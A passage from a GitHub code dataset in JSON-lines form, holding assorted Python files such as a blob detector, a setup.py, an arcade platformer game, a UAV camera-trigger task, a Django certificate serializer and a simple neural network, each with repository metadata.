e:\n\t text = e\n return render_template(\"form.html\", text=text, context=res['context'])\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","repo_name":"danwhale/Public-Key-Neural-Steganography","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3413037391","text":"#!/usr/bin/env python\nif __name__ != '__main__': raise Exception(\"Do not import me!\") # noqa: E701\n# ruff: noqa: E402\n\nmissing = []\ntry:\n from cvargparse import Arg\n from cvargparse import BaseParser\nexcept ImportError:\n missing.append(\"cvargparse~=0.5\")\n\ntry:\n import skimage # noqa: F401\nexcept ImportError:\n missing.append(\"scikit-image\")\n\ntry:\n import PyQt5 # noqa: F401\nexcept ImportError:\n missing.append(\"pyqt5\")\n\nif missing:\n print(\"Please install additional packages to use this script:\")\n print(\"pip install \" + \" \".join(missing))\n exit()\n\nimport cv2\n\nfrom matplotlib import pyplot as plt\n\nfrom blob_detector import utils\nfrom blob_detector.core.binarizers import BinarizerType\nfrom blob_detector.core.pipeline import Pipeline\n\n\ndef main(args):\n img_proc = Pipeline()\n img_proc.find_border()\n if args.min_size > 0:\n img_proc.rescale(min_size=args.min_size, min_scale=0.1)\n\n img_proc.preprocess(equalize=False, sigma=args.sigma)\n img_proc.binarize(\n type=BinarizerType.gauss_local,\n use_masked=True,\n use_cv2=True,\n window_size=args.window_size,\n offset=args.C,\n )\n\n img_proc.remove_border()\n img_proc.open_close(\n kernel_size=args.morph_kernel,\n iterations=args.morph_iters)\n\n bbox_proc = Pipeline()\n bbox_proc.detect(use_masked=True)\n\n _, splitter = bbox_proc.split_bboxes(\n preproc=Pipeline(), detector=Pipeline())\n\n _, bbox_filter = bbox_proc.bbox_filter(\n score_threshold=0.5,\n nms_threshold=0.3,\n enlarge=args.enlarge,\n )\n _, scorer = bbox_proc.score()\n\n img_proc.requires_input(splitter.set_image)\n img_proc.requires_input(bbox_filter.set_image)\n img_proc.requires_input(scorer.set_image)\n\n im = cv2.imread(args.file_path, cv2.IMREAD_COLOR)\n gray_im = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n\n res = img_proc(gray_im)\n\n if args.show_intermediate:\n utils.show_intermediate(res, masked=args.show_masked, separate=args.show_separate)\n\n detections = bbox_proc(res)\n\n if args.show_intermediate:\n utils.show_intermediate(detections, masked=args.show_masked, separate=args.show_separate)\n\n fig, ax0 = plt.subplots()\n ax0.imshow(cv2.cvtColor(im, cv2.COLOR_BGR2RGB))\n\n for bbox in detections.bboxes:\n if not bbox.active:\n continue\n bbox.plot(im, ax=ax0, edgecolor=\"blue\")\n\n plt.show()\n plt.close()\n\n\n\nparser = BaseParser([\n Arg(\"file_path\"),\n\n Arg.int(\"--min_size\", \"-size\", default=1080),\n Arg.int(\"--C\", \"-C\", default=2),\n Arg.int(\"--window_size\", \"-ws\", default=31),\n Arg.float(\"--sigma\", \"-sig\", default=5.0),\n Arg.int(\"--morph_kernel\", \"-mk\", default=5),\n Arg.int(\"--morph_iters\", \"-mi\", default=2),\n Arg.float(\"--enlarge\", default=0.01),\n\n Arg.flag(\"--show_intermediate\", \"-intermediate\"),\n Arg.flag(\"--show_masked\", \"-masked\"),\n Arg.flag(\"--show_separate\", \"-separate\"),\n\n])\n\nmain(parser.parse_args())\n\n\n\n","repo_name":"cvjena/blob_detector","sub_path":"blob_detector/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"43837257104","text":"#!/usr/bin/env python\nfrom os import path\n\nimport setuptools\n\n\ndef parse_requirements(filename):\n \"\"\" load requirements from a pip requirements file \"\"\"\n lineiter = (line.strip() for line in open(filename))\n return [line for line in lineiter if line and not line.startswith(\"#\")]\n\n\nfrom metasdk import info\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.md')) as f:\n long_description = f.read()\n\npackages = [\n 'metasdk',\n 'metasdk.tools',\n 'metasdk.logger',\n 'metasdk.services'\n]\n\ninstall_reqs = parse_requirements('requirements.txt')\nreqs = install_reqs\n\nsetuptools.setup(\n name=info.__package_name__,\n version=info.__version__,\n\n description='Devision Meta SDK',\n long_description=long_description,\n\n url='https://github.com/devision-io/metasdk',\n\n author='Artur Geraschenko',\n author_email='arturgspb@gmail.com',\n\n license='MIT',\n\n classifiers=[\n 'Programming Language :: Python :: 3'\n ],\n install_requires=reqs,\n packages=packages,\n package_data={'': ['LICENSE']},\n package_dir={'metasdk': 'metasdk'},\n include_package_data=True,\n)\n","repo_name":"devision-io/metasdk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"15481437339","text":"#!/usr/bin/python\n\nimport math\n\ndef recipe_batches(recipe, ingredients):\n max_batches = 0\n\n recipe_keys = set(recipe.keys())\n ingredients_keys = set(ingredients.keys())\n\n\n common_ingredients = set(recipe_keys).intersection(set(ingredients_keys))\n# first thing we want to check is if we even have the ingredients for the recipe in the first place.\n if len(common_ingredients) != len(recipe):\n return 0\n for key, value in ingredients.items():\n if not key in recipe:\n continue\n batch = value // recipe[key]\n\n if max_batches is 0 or batch < max_batches:\n max_batches = batch\n return max_batches\n # for key , value in recipe.items():\n # print(ingredients[key])\n # if key != ingredients[key]:\n # print(f\"We are missing an ingredient {ingredients.items()}\")\n\n\n\nif __name__ == '__main__':\n # Change the entries of these dictionaries to test\n # your implementation with different inputs\n recipe = { 'milk': 100, 'butter': 50, 'flour': 5}\n ingredients = { 'milk': 132, 'butter': 48, 'flour': 51 }\n print(\"{batches} batches can be made from the available ingredients: {ingredients}.\".format(batches=recipe_batches(recipe, ingredients), ingredients=ingredients))\n","repo_name":"ChrisDelf/Algorithms","sub_path":"recipe_batches/recipe_batches.py","file_name":"recipe_batches.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"38375050870","text":"from datetime import datetime\nimport collections\n\n\nclass Solution:\n def minPartitions(self, n: str) -> int:\n answer = 0\n for i in n:\n ii = int(i)\n if ii == 9:\n return ii\n else:\n if ii > answer:\n answer = ii\n return answer\n\n\n\nif __name__ == \"__main__\":\n start_time = datetime.now()\n sol = Solution()\n print(minPartitions(\"32\"))\n\n end_time = datetime.now()\n print('Duration: {}'.format(end_time - start_time))","repo_name":"koba4444/leetcode","sub_path":"n01689.py","file_name":"n01689.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74077540524","text":"def rotate(matrix) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n temp = [list(i) for i in list(zip(*matrix))]\n print(temp)\n res = []\n for i in temp:\n print(i[::-1])\n res.append(i[::-1])\n \n for i in range(len(matrix)):\n for j in range(len(matrix[i])):\n matrix[i][j] = res[i][j]\n\nrotate([[1,2,3],[4,5,6],[7,8,9]])","repo_name":"Alfy102/leetcodePractice","sub_path":"Arrays/rotateMatrixInPlace/rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12258424600","text":"\"\"\"\nPlatformer Game\n\"\"\"\nimport arcade\n\n# Constants\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = 650\nSCREEN_TITLE = \"Doge Game\"\n\n# Constants used to scale our sprites from their original size\nCHARACTER_SCALING = 1\nTILE_SCALING = 0.5\nCOIN_SCALING = 0.5\n\nSPRITE_PIXEL_SIZE = 128\nGRID_PIXEL_SIZE = (SPRITE_PIXEL_SIZE * TILE_SCALING)\n\n# Movement speed of player, in pixels per frame\n#PLAYER_MOVEMENT_SPEED = 10\nGRAVITY = 1\n#PLAYER_JUMP_SPEED = 20\n\n# How many pixels to keep as a minimum margin between the character\n# and the edge of the screen.\nLEFT_VIEWPORT_MARGIN = 200\nRIGHT_VIEWPORT_MARGIN = 200\nBOTTOM_VIEWPORT_MARGIN = 150\nTOP_VIEWPORT_MARGIN = 100\n\n# Karakterin Başlangıç yeri\nPLAYER_START_X = 64\nPLAYER_START_Y = 225\n\n\nclass MyGame(arcade.Window):\n \"\"\"\n Main application class.\n \"\"\"\n\n def __init__(self):\n\n # Call the parent class and set up the window\n super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)\n\n # Oyun müziği oyun açıldığında aktif ediliyor.\n self.gamesound = True\n\n # Karakterin zıplama ve hareket hızı\n self.playerspeed = 10\n self.playerjumpspeed = 20\n\n # These are 'lists' that keep track of our sprites. Each sprite should\n # go into a list.\n self.coin_list = None\n self.wall_list = None\n self.player_list = None\n\n self.foreground_list = None\n self.background_list = None\n self.dont_touch_list = None\n self.buz_list = None\n self.ladder_list = None\n\n\n # Separate variable that holds the player sprite\n self.player_sprite = None\n\n # Our physics engine\n self.physics_engine = None\n\n # Used to keep track of our scrolling\n self.view_bottom = 0\n self.view_left = 0\n\n # Keep track of the score\n self.score = 0\n\n # Keep track of the your dead\n self.donttouch_counter = 0\n\n # Where is the right edge of the map?\n self.end_of_map = None\n self.exit_of_game = None\n\n # Level\n self.level = 1 # Harita bittiğinde level artıyor ve diğer haritaya geçiyoruz.\n\n # Müzik efektleri\n self.collect_coin_sound = arcade.load_sound(\":resources:sounds/coin1.wav\")\n self.jump_sound = arcade.load_sound(\":resources:sounds/jump1.wav\")\n self.game_over = arcade.load_sound(\":resources:sounds/gameover1.wav\") #Yeni ses efektimiz. Karakter ölünce çalışıyor.\n self.background_sound = arcade.load_sound(\"C:/Users/duhan/Desktop/ÜNİVERSİTE/BEYKOZ/Beykoz2 Dönem2/Mühendislik Projesi 2/platform_tutorial/tothemoon.mp3\")\n\n def setup(self, level):\n \"\"\" Set up the game here. Call this function to restart the game. \"\"\"\n\n # Used to keep track of our scrolling\n self.view_bottom = 0\n self.view_left = 0\n\n # Keep track of the score\n self.score = 0\n\n # Create the Sprite lists\n self.player_list = arcade.SpriteList()\n self.wall_list = arcade.SpriteList()\n self.coin_list = arcade.SpriteList()\n\n self.foreground_list = arcade.SpriteList() #ön plan\n self.background_list = arcade.SpriteList() #arka plan\n self.end_of_map = arcade.SpriteList()\n self.exit_of_game = arcade.SpriteList()\n self.buz_list = arcade.SpriteList()\n\n\n # Set up the player, specifically placing it at these coordinates.\n image_source = \"C:/Users/duhan/Desktop/ÜNİVERSİTE/BEYKOZ/Beykoz2 Dönem2/Mühendislik Projesi 2/platform_tutorial/yuruyendogem.png\"\n self.player_sprite = arcade.Sprite(image_source, CHARACTER_SCALING)\n self.player_sprite.center_x = PLAYER_START_X\n self.player_sprite.center_y = PLAYER_START_Y\n self.player_list.append(self.player_sprite)\n\n # --- Load in a map from the tiled editor ---\n\n # Name of the layer in the file that has our platforms/walls\n platforms_layer_name = 'Platforms'\n moving_platforms_layer_name = 'Moving Platforms'\n\n # Name of the layer that has items for pick-up\n coins_layer_name = 'DogeCoin'\n\n # Name of the layer that has items for foreground\n foreground_layer_name = 'Foreground'\n\n # Name of the layer that has items for background\n background_layer_name = 'Background'\n\n # Name of the layer that has items we shouldn't touch\n dont_touch_layer_name = \"Don't Touch\"\n\n # Name of the layer that has finish map\n end_layer_name = 'End'\n exit_layer_name = \"Exit\"\n\n #Buzlu (Yürümek zor)\n buz_layer = 'Buz'\n\n # Map name\n map_name = f\"C:/Users/duhan/Desktop/ÜNİVERSİTE/BEYKOZ/Beykoz2 Dönem2/Mühendislik Projesi 2/platform_tutorial/map2_level_{level}.tmx\"\n\n # Read in the tiled map\n my_map = arcade.tilemap.read_tmx(map_name)\n\n # Calculate the right edge of the my_map in pixels\n # self.end_of_map = my_map.map_size.width * GRID_PIXEL_SIZE # !!!!!!!\n\n self.end_of_map = arcade.tilemap.process_layer(my_map,\n end_layer_name,\n TILE_SCALING,\n use_spatial_hash=True)\n\n self.exit_of_game = arcade.tilemap.process_layer(my_map,\n exit_layer_name,\n TILE_SCALING,\n use_spatial_hash=True)\n\n # -- Background\n self.background_list = arcade.tilemap.process_layer(my_map,\n background_layer_name,\n TILE_SCALING)\n # -- Background objects\n self.ladder_list = arcade.tilemap.process_layer(my_map,\n \"Ladders\",\n scaling=TILE_SCALING,\n use_spatial_hash=True)\n\n # -- Foreground\n self.foreground_list = arcade.tilemap.process_layer(my_map,\n foreground_layer_name,\n TILE_SCALING)\n\n # -- Platforms\n self.wall_list = arcade.tilemap.process_layer(map_object=my_map,\n layer_name=platforms_layer_name,\n scaling=TILE_SCALING,\n use_spatial_hash=True)\n\n # -- Moving Platforms #yeni\n moving_platforms_list = arcade.tilemap.process_layer(my_map, moving_platforms_layer_name, TILE_SCALING)\n for sprite in moving_platforms_list:\n self.wall_list.append(sprite)\n\n # -- Coins\n self.coin_list = arcade.tilemap.process_layer(my_map,\n coins_layer_name,\n TILE_SCALING,\n use_spatial_hash=True)\n\n # -- Don't Touch Layer\n self.dont_touch_list = arcade.tilemap.process_layer(my_map,\n dont_touch_layer_name,\n TILE_SCALING,\n use_spatial_hash=True)\n #yeni\n self.buz_list = arcade.tilemap.process_layer(map_object=my_map,\n layer_name=buz_layer,\n scaling=TILE_SCALING,\n use_spatial_hash=True)\n\n # --- Other stuff\n # Levellere göre arka plan rengi değişiyor.\n\n if my_map.background_color:\n if(self.level==0):\n arcade.set_background_color(arcade.csscolor.BLACK)\n elif(self.level==1):\n arcade.set_background_color(arcade.csscolor.CORNFLOWER_BLUE)\n elif(self.level==2):\n arcade.set_background_color(arcade.csscolor.GRAY)\n elif(self.level==3):\n arcade.set_background_color(arcade.csscolor.SADDLE_BROWN)\n elif(self.level==4):\n arcade.set_background_color(arcade.csscolor.PURPLE)\n\n\n # Create the 'physics engine'\n self.physics_engine = arcade.PhysicsEnginePlatformer(self.player_sprite,\n self.wall_list,\n gravity_constant=GRAVITY,\n ladders=self.ladder_list)\n\n def on_draw(self):\n \"\"\" Render the screen. \"\"\"\n\n # Clear the screen to the background color\n arcade.start_render()\n\n # Draw our sprites --> Çizimler\n self.wall_list.draw()\n self.background_list.draw()\n self.coin_list.draw()\n self.dont_touch_list.draw()\n self.player_list.draw()\n self.foreground_list.draw()\n self.end_of_map.draw()\n self.exit_of_game.draw()\n self.ladder_list.draw()\n self.buz_list.draw()\n\n # Draw our score on the screen, scrolling it with the viewport\n score_text = f\"Doge Coin: {self.score}\"\n arcade.draw_text(score_text, 10 + self.view_left, 10 + self.view_bottom,\n arcade.csscolor.BLACK, 18)\n\n dead_text = f\"Kalan Hakkınız: {5-self.donttouch_counter}\"\n arcade.draw_text(dead_text, 10 + self.view_left, 50 + self.view_bottom,\n arcade.csscolor.BLACK, 18)\n\n def on_key_press(self, key, modifiers):\n \"\"\"Called whenever a key is pressed. \"\"\"\n\n if key == arcade.key.UP or key == arcade.key.W or key == arcade.key.SPACE:\n if self.physics_engine.is_on_ladder():\n self.player_sprite.change_y = self.playerspeed\n elif self.physics_engine.can_jump():\n self.player_sprite.change_y = self.playerjumpspeed\n arcade.play_sound(self.jump_sound)\n elif key == arcade.key.DOWN or key == arcade.key.S:\n if self.physics_engine.is_on_ladder():\n self.player_sprite.change_y = -self.playerspeed\n elif key == arcade.key.LEFT or key == arcade.key.A:\n self.player_sprite.change_x = -self.playerspeed\n elif key == arcade.key.RIGHT or key == arcade.key.D:\n self.player_sprite.change_x = self.playerspeed\n\n\n def on_key_release(self, key, modifiers):\n \"\"\"Called when the user releases a key. \"\"\"\n\n if key == arcade.key.LEFT or key == arcade.key.A:\n self.player_sprite.change_x = 0\n elif key == arcade.key.RIGHT or key == arcade.key.D:\n self.player_sprite.change_x = 0\n\n def update(self, delta_time):\n \"\"\" Movement and game logic \"\"\"\n\n if (self.gamesound == True):\n arcade.play_sound(self.background_sound)\n self.gamesound = False\n\n # Move the player with the physics engine\n self.physics_engine.update()\n\n # Player ile Coinler arasında bir temas var mı?\n coin_hit_list = arcade.check_for_collision_with_list(self.player_sprite,\n self.coin_list)\n buz_hit_list = arcade.check_for_collision_with_list(self.player_sprite,\n self.buz_list)\n end_hit_list = arcade.check_for_collision_with_list(self.player_sprite,\n self.end_of_map)\n exit_hit_list = arcade.check_for_collision_with_list(self.player_sprite,\n self.exit_of_game)\n\n for end in end_hit_list:\n self.playerspeed = 10\n self.playerjumpspeed = 20\n\n for buz in buz_hit_list:\n self.playerspeed = 3\n self.playerjumpspeed = 5\n\n # Loop through each coin we hit (if any) and remove it\n for coin in coin_hit_list:\n # Remove the coin\n coin.remove_from_sprite_lists()\n # Play a sound\n arcade.play_sound(self.collect_coin_sound)\n # Add one to the score\n self.score += 1\n\n for exit in exit_hit_list:\n exit.remove_from_sprite_lists()\n self.level = 6\n self.setup(self.level)\n\n # Player ile Bayrak arasında bir temas var mı?\n door_hit_list = arcade.check_for_collision_with_list(self.player_sprite,\n self.end_of_map)\n\n for door in door_hit_list:\n # Bayrak silinsin\n door.remove_from_sprite_lists()\n # Play a sound\n # Müzik Sonradan eklerim.\n # Level artsın.\n self.level += 1\n self.setup(self.level)\n\n # Track if we need to change the viewport\n changed_viewport = False\n\n # KARAKTERİN ÖLÜP YENİDEN DOĞMASI\n\n # Oyuncu haritadan düştü mü?\n if self.player_sprite.center_y < -1000:\n self.player_sprite.center_x = PLAYER_START_X\n self.player_sprite.center_y = PLAYER_START_Y\n self.donttouch_counter = self.donttouch_counter + 1 # Ölüm sayınızı tutar\n if (self.donttouch_counter == 5):\n self.level = 0\n self.donttouch_counter = 0\n # Set the camera to the start\n self.view_left = 0\n self.view_bottom = 0\n changed_viewport = True\n arcade.play_sound(self.game_over)\n\n\n # Oyuncu dokunmaması gereken bir şeye dokundu mu?\n if arcade.check_for_collision_with_list(self.player_sprite,\n self.dont_touch_list):\n self.player_sprite.change_x = 0\n self.player_sprite.change_y = 0\n self.player_sprite.center_x = PLAYER_START_X\n self.player_sprite.center_y = PLAYER_START_Y\n self.donttouch_counter = self.donttouch_counter + 1 # Ölüm sayınızı tutar\n if (self.donttouch_counter == 5):\n self.level = 0\n self.donttouch_counter = 0\n\n\n # Set the camera to the start\n self.view_left = 0\n self.view_bottom = 0\n changed_viewport = True\n arcade.play_sound(self.game_over)\n\n # Load the next level\n self.setup(self.level)\n\n # Set the camera to the start\n self.view_left = 0\n self.view_bottom = 0\n changed_viewport = True\n\n # --- Manage Scrolling ---\n\n # Scroll left\n left_boundary = self.view_left + LEFT_VIEWPORT_MARGIN\n if self.player_sprite.left < left_boundary:\n self.view_left -= left_boundary - self.player_sprite.left\n changed_viewport = True\n\n # Scroll right\n right_boundary = self.view_left + SCREEN_WIDTH - RIGHT_VIEWPORT_MARGIN\n if self.player_sprite.right > right_boundary:\n self.view_left += self.player_sprite.right - right_boundary\n changed_viewport = True\n\n # Scroll up\n top_boundary = self.view_bottom + SCREEN_HEIGHT - TOP_VIEWPORT_MARGIN\n if self.player_sprite.top > top_boundary:\n self.view_bottom += self.player_sprite.top - top_boundary\n changed_viewport = True\n\n # Scroll down\n bottom_boundary = self.view_bottom + BOTTOM_VIEWPORT_MARGIN\n if self.player_sprite.bottom < bottom_boundary:\n self.view_bottom -= bottom_boundary - self.player_sprite.bottom\n changed_viewport = True\n\n if changed_viewport:\n # Only scroll to integers. Otherwise we end up with pixels that\n # don't line up on the screen\n self.view_bottom = int(self.view_bottom)\n self.view_left = int(self.view_left)\n\n # Do the scrolling\n arcade.set_viewport(self.view_left,\n SCREEN_WIDTH + self.view_left,\n self.view_bottom,\n SCREEN_HEIGHT + self.view_bottom)\n\n\ndef main():\n \"\"\" Main method \"\"\"\n window = MyGame()\n window.setup(window.level)\n arcade.run()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"duhankosali/Doge-Game_Python-Game-Project","sub_path":"pythonProject4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"35007875652","text":"import math\n\nfrom PropertyTree import PropertyNode\nfrom rcUAS import wgs84\n\nimport comms.events\nfrom mission.task.task import Task\n\nd2r = math.pi / 180.0\n\nclass Camera(Task):\n def __init__(self, config_node):\n Task.__init__(self)\n self.imu_node = PropertyNode(\"/sensors/imu/0\")\n self.pos_node = PropertyNode(\"/position\")\n self.orient_node = PropertyNode(\"/orientation\")\n self.flight_node = PropertyNode(\"/controls/flight\")\n self.task_node = PropertyNode(\"/task\")\n self.comms_node = PropertyNode(\"/comms\")\n self.name = config_node.getString(\"name\")\n self.start_time = 0.0\n self.max_attitude = 20.0\n if config_node.hasChild(\"trigger\"):\n self.trigger_name = config_node.getString(\"trigger\")\n else:\n self.trigger_name = \"gear\"\n if config_node.hasChild(\"forward_fov_deg\"):\n self.forward_fov_deg = config_node.getDouble(\"forward_fov_deg\")\n if self.forward_fov_deg < 10: self.forward_fov_deg = 10\n if self.forward_fov_deg > 170: self.forward_fov_deg = 170\n else:\n self.forward_fov_deg = 60\n self.fov2_tan = math.tan(self.forward_fov_deg*0.5 * d2r)\n if config_node.hasChild(\"lateral_fov_deg\"):\n self.lateral_fov_deg = config_node.getDouble(\"lateral_fov_deg\")\n if self.lateral_fov_deg < 10: self.lateral_fov_deg = 10\n if self.lateral_fov_deg > 170: self.lateral_fov_deg = 170\n else:\n self.lateral_fov_deg = 60\n if config_node.hasChild(\"overlap\"):\n self.overlap = config_node.getDouble(\"overlap\")\n if self.overlap < 0: self.overlap = 0\n if self.overlap > 1: self.overlap = 1\n else:\n self.overlap = 0.7\n self.min_interval = 0.5\n self.max_interval = 10.0\n self.trigger_state = False\n self.trigger_time = 0.0\n self.last_lat = 0.0\n self.last_lon = 0.0\n \n def activate(self):\n self.active = True\n \n def update(self, dt):\n if not self.active:\n return False\n\n cur_time = self.imu_node.getDouble(\"timestamp\")\n force_trigger = False\n if self.trigger_state:\n # needs to be 0.3 with manual focus\n if cur_time > self.trigger_time + 0.3:\n # release trigger\n self.trigger_state = False\n self.flight_node.setDouble(self.trigger_name, 0.0)\n # camera shutter is triggered on release (after being\n # depressed for 0.3 seconds) so log the event here.\n comms.events.log(\"camera\", \"%.8f %.8f %.1f\" % \\\n (self.pos_node.getDouble('latitude_deg'),\n self.pos_node.getDouble('longitude_deg'),\n self.pos_node.getDouble('altitude_m')))\n return True\n else:\n if cur_time < self.trigger_time + self.min_interval:\n # min interval not yet elapsed\n return True\n elif cur_time >= self.trigger_time + self.max_interval:\n # print \" max interval force trigger\"\n force_trigger = True\n\n roll_deg = self.orient_node.getDouble(\"roll_deg\")\n pitch_deg = self.orient_node.getDouble(\"pitch_deg\")\n if abs(roll_deg) <= self.max_attitude and abs(pitch_deg) <= self.max_attitude:\n # if aircraft in a level enough configuration: compute\n # course and distance from previous trigger\n pos_lon = self.pos_node.getDouble(\"longitude_deg\")\n pos_lat = self.pos_node.getDouble(\"latitude_deg\")\n (course_deg, rev_deg, dist_m) = \\\n wgs84.geo_inverse( self.last_lat, self.last_lon,\n pos_lat, pos_lon )\n agl = self.pos_node.getDouble('altitude_agl_m')\n thresh_dist_m = 2 * self.fov2_tan * agl * (1.0 - self.overlap)\n if dist_m >= thresh_dist_m and self.task_node.getBool('is_airborne'):\n # if we are flying and have moved far enough\n # print \" distance based trigger:\", thresh_dist_m, dist_m\n force_trigger = True\n\n if force_trigger:\n self.last_lat = self.pos_node.getDouble('latitude_deg')\n self.last_lon = self.pos_node.getDouble('longitude_deg')\n self.trigger_time = cur_time\n self.trigger_state = True\n self.flight_node.setDouble(self.trigger_name, 0.68)\n \n def is_complete(self):\n return False\n \n def close(self):\n self.active = False\n return True\n","repo_name":"NorthStarUAS/rc-flight","sub_path":"src/mission/task/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"19"} +{"seq_id":"35531263571","text":"#对象属性和类属性\nclass A():\n #在这里定义的属性是类属性,如果没有同名的对象属性,则调用类属性\n name = 'a'\n def __init__(self,name):\n self.name = name\n self.haha = 1\n\na = A('haha')\nprint(a.name)\n#类只能调用类属性\n#print(A.haha)\nprint(A.name)\ndel a.name\nprint(a.name)\n\n#注意一般不要将对象属性与类属性同名,否则对象属性将屏蔽掉类属性\n\n","repo_name":"StarLord777/Python-OOP-High","sub_path":"OOP/13-对象属性和类属性.py","file_name":"13-对象属性和类属性.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41515547861","text":"from django.utils.encoding import smart_text, smart_bytes\nfrom rest_framework import serializers\n\nfrom app.models.certificate import Certificate, \\\n CERTIFICATE_PRIVATE_KEY_MAX_LENGTH\n\n\nclass PrivateKeyField(serializers.CharField):\n def to_representation(self, value):\n \"\"\"\n Convert the internal binary representation to the passed string.\n\n :param value: internal value\n :return: external representation\n \"\"\"\n return smart_text(value)\n\n def to_internal_value(self, data):\n \"\"\"\n Convert the passed string to the internal binary representation.\n\n :param data: object with request data\n :return: internal value\n \"\"\"\n private_key = str(data.get('private_key'))\n return smart_bytes(private_key)\n\n\nclass CertificateSerializer(serializers.ModelSerializer):\n \"\"\"\n A CertificateSerializer:\n - Allows reads to all fields.\n - Allows writes to all fields.\n \"\"\"\n private_key = PrivateKeyField(max_length=CERTIFICATE_PRIVATE_KEY_MAX_LENGTH)\n\n class Meta:\n model = Certificate\n fields = '__all__'\n\n\nclass CertificateUpdateSerializer(serializers.ModelSerializer):\n \"\"\"\n A CertificateUpdateSerializer:\n - Allows writes to 'active' only.\n \"\"\"\n\n class Meta:\n model = Certificate\n fields = ('active',)\n","repo_name":"hcourt/minicert","sub_path":"app/serialization/certificate.py","file_name":"certificate.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39220278363","text":"\nimport numpy as np\nimport numpy.random as rand\nimport scipy.special as ss\n\n\nclass NeuralNetwork:\n\n def __init__(self, inNodes, hidNodes, outNodes, alpha, beta, bias, outputActivationFun):\n\n self.iNodes = inNodes\n self.hNodes = hidNodes\n self.oNodes = outNodes\n\n # learning rate\n self.alpha = alpha\n self.beta = beta\n\n self.hWeights = rand.normal(0.0, 0.5, (self.hNodes, self.iNodes))\n self.hWeightsDelta = np.zeros((self.hNodes, self.iNodes))\n\n self.oWeights = rand.normal(0.0, 0.5, (self.oNodes, self.hNodes))\n self.oWeightsDelta = np.zeros((self.oNodes, self.hNodes))\n\n # turning on/off bias (default bias turned off)\n if bias is False:\n self.bias = 0\n self.hBias = np.zeros((self.hNodes, 1))\n self.hBiasDelta = np.zeros((self.hNodes, 1))\n\n self.oBias = np.zeros((self.oNodes, 1))\n self.oBiasDelta = np.zeros((self.oNodes, 1))\n else:\n self.bias = 1\n self.hBias = rand.normal(0.0, 0.5, (self.hNodes, 1))\n self.hBiasDelta = np.zeros((self.hNodes, 1))\n\n self.oBias = rand.normal(0.0, 0.5, (self.oNodes, 1))\n self.oBiasDelta = np.zeros((self.oNodes, 1))\n\n self.hActFun = lambda z: ss.expit(z)\n\n # activation function for output layer\n if outputActivationFun is False:\n self.oActFun = lambda z: ss.expit(z)\n self.oErrFun = lambda x, y: ((x - y) * x * (1 - x))\n else:\n self.oActFun = lambda z: z\n self.oErrFun = lambda x, y: ((x - y))\n\n def train(self, arrU, arrV):\n arrU = np.array(arrU, ndmin=2)\n\n # arrX - hidden layer output\n hidZ = np.inner(arrU, self.hWeights) + self.hBias.T\n arrX = self.hActFun(hidZ)\n\n # Y - output layer output\n outZ = np.inner(arrX, self.oWeights) + self.oBias.T\n Y = self.oActFun(outZ)\n\n # oErr - backward propagation of errors for output layer\n arrV = np.array(arrV)\n oErr = self.oErrFun(Y, arrV)\n\n # hErr - backward propagation of errors for hidden layer\n sigma = np.inner(oErr, self.oWeights.T)\n hErr = ((sigma * arrX * (1 - arrX)))\n\n self.oWeights -= self.alpha * oErr.T * arrX + self.oWeightsDelta\n self.hWeights -= self.alpha * hErr.T * arrU + self.hWeightsDelta\n\n self.oWeightsDelta = self.beta * (self.alpha * oErr.T * arrX + self.oWeightsDelta)\n self.hWeightsDelta = self.beta * (self.alpha * hErr.T * arrU + self.hWeightsDelta)\n\n if self.bias != 0:\n self.oBias -= self.alpha * oErr.T + self.oBiasDelta\n self.hBias -= self.alpha * hErr.T + self.hBiasDelta\n\n self.oBiasDelta = self.beta * (self.alpha * oErr.T + self.oBiasDelta)\n self.hBiasDelta = self.beta * (self.alpha * hErr.T + self.hBiasDelta)\n\n def query(self, arrU):\n arrU = np.array(arrU, ndmin=2)\n hidZ = np.inner(arrU, self.hWeights) + self.hBias.T\n arrX = self.hActFun(hidZ)\n outZ = np.inner(arrX, self.oWeights) + self.oBias.T\n return (self.oActFun(outZ)[0])\n\n def hiddenQuery(self, arrU):\n arrU = np.array(arrU, ndmin=2)\n hidZ = np.inner(arrU, self.hWeights) + self.hBias.T\n return np.squeeze(self.hActFun(hidZ))\n","repo_name":"Podlewski/IAD","sub_path":"Zadanie 1/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"32651583506","text":"from pymongo import MongoClient\nimport pymongo\nimport json\nimport csv\nfrom mongo_db_connect import db\nfrom scipy.stats.stats import pearsonr\n\nitems = 